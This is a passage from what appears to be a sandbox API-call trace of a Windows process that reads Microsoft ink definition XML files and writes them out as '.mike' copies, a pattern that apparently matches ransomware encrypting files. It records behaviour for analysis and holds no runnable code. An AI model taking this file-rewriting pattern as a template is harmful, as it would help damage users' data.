files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.945] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.945] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.945] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.946] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.946] GetFileType (hFile=0x264) returned 0x1 [0045.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.946] GetFileType (hFile=0x264) returned 0x1 [0045.946] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.946] WriteFile (in: hFile=0x264, lpBuffer=0x21ea43c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21ea43c*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.947] CloseHandle (hObject=0x264) returned 1 [0045.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.947] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), fInfoLevelId=0x0, lpFileInformation=0x21e9f18 | out: lpFileInformation=0x21e9f18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8)) returned 1 [0045.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.947] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.947] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.947] GetFileType (hFile=0x264) returned 0x1 [0045.948] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.948] GetFileType (hFile=0x264) returned 0x1 [0045.948] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.948] ReadFile (in: hFile=0x264, lpBuffer=0x21eb570, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21eb570*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0045.949] CloseHandle (hObject=0x264) returned 1 [0045.950] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.950] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.950] GetFileType (hFile=0x264) returned 0x1 [0045.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.950] GetFileType (hFile=0x264) returned 0x1 [0045.950] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.951] WriteFile (in: hFile=0x264, lpBuffer=0x21f5ad8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x21f5ad8*, lpNumberOfBytesWritten=0x2af04c*=0x2800, lpOverlapped=0x0) returned 1 [0045.951] CloseHandle (hObject=0x264) returned 1 [0045.952] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.952] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.952] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.952] GetFileType (hFile=0x264) returned 0x1 [0045.952] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.952] GetFileType (hFile=0x264) returned 0x1 [0045.952] SetFilePointer (in: hFile=0x264, lDistanceToMove=10240, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x2800 [0045.952] ReadFile (in: hFile=0x264, lpBuffer=0x21f854c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21f854c*, lpNumberOfBytesRead=0x2af038*=0x18e8, lpOverlapped=0x0) returned 1 [0045.952] CloseHandle (hObject=0x264) returned 1 [0045.953] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.953] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.953] GetFileType (hFile=0x264) returned 0x1 [0045.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.953] GetFileType (hFile=0x264) returned 0x1 [0045.953] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2a20 [0045.953] WriteFile (in: hFile=0x264, lpBuffer=0x2202f4c*, nNumberOfBytesToWrite=0x18f0, lpNumberOfBytesWritten=0x2af04c, lpOverlapped=0x0 | out: lpBuffer=0x2202f4c*, lpNumberOfBytesWritten=0x2af04c*=0x18f0, lpOverlapped=0x0) returned 1 [0045.954] CloseHandle (hObject=0x264) returned 1 [0045.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.955] GetFileType (hFile=0x264) returned 0x1 [0045.955] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.955] GetFileType (hFile=0x264) returned 0x1 [0045.956] WriteFile (in: hFile=0x264, lpBuffer=0x2206bb4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x2206bb4*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.956] CloseHandle (hObject=0x264) returned 1 [0045.956] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.956] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.957] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe597d160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe597d160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe597d160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4310)) returned 1 [0045.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.957] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x22083a8 | out: lpFileInformation=0x22083a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe597d160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe597d160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe597d160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4310)) returned 1 [0045.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.957] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.957] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", dwFileAttributes=0x80) returned 0 [0045.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.958] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe597d160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe597d160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe597d160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x4310)) returned 1 [0045.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpFilePart=0x0) returned 0x4f [0045.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike", lpFilePart=0x0) returned 0x54 [0045.958] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml.mike")) returned 1 [0045.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.960] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.960] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.960] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.961] GetFileType (hFile=0x264) returned 0x1 [0045.961] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.961] GetFileType (hFile=0x264) returned 0x1 [0045.961] CloseHandle (hObject=0x264) returned 1 [0045.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.962] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.962] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.962] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), fInfoLevelId=0x0, lpFileInformation=0x220a588 | out: lpFileInformation=0x220a588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9)) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpFilePart=0x0) returned 0x4f [0045.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.962] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), fInfoLevelId=0x0, lpFileInformation=0x220a8bc | out: lpFileInformation=0x220a8bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9)) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.962] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.963] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.963] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.963] GetFileType (hFile=0x264) returned 0x1 [0045.963] SetThreadErrorMode (dwNewMode=0x0, 